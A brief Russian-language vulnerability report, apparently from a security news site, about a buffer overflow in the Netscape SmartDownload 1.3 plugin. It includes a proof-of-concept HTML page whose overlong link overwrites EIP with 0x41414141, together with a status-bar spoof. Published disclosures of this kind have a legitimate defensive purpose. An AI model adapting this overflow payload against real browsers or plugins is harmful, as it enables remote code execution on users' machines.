У Netscape в плагине SmartDownload (для
докачки файлов используется) есть
неправильная обработка ссылки, используя
эту лазейку у пользователя, можно на компе
исполнить произвольный код, при этом юзеру
даже не надо будет кликать на ссылку –
SmartDownload обрабатывает ВСЕ полученные ссылки.

Уязвимые системы:

Netscape SmartDownload 1.3
Пример (записываем в EIP 0x41414141, откуда такое
число, я, правда, не совсем понял – но по идее
сюда можно впихнуть любой код, он и
выполнится):

<HTML>
<BODY>
This is a test.
<P>
<A HREF="http://www.example.com/.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA AAAAAA"
onMouseOver="window.status='I am friendly'; return true">Crash Me</A>
<P>
End test.
</BODY>
</HTML>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии